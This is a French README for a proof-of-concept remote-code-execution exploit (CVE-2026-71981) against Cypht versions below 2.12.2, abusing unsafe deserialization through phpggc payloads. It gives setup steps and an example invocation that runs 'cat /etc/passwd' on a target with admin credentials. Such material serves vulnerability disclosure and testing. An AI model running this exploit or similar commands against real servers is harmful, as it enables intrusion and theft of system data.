
Preuve de concept d'exploitation pour CVE-2026-71981, une RCE par désérialisation non sécurisée dans Cypht. Exécute des commandes et affiche la sortie via la réponse de déconnexion. Nécessite phpggc pour la génération de la charge utile.
Ceci est un PoC pour la CVE-2026-71981, une RCE par désérialisation non sécurisée. Le résultat de la commande exécutée est affiché dans la réponse à la requête de déconnexion après les balises </body></html>. Utilisez --print-all pour également afficher la réponse complète.
Versions vulnérables : < v2.12.2
Ce script nécessite l'installation de https://github.com/ambionics/phpggc afin de générer les payloads unserialize().
Configuration et exemple :
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help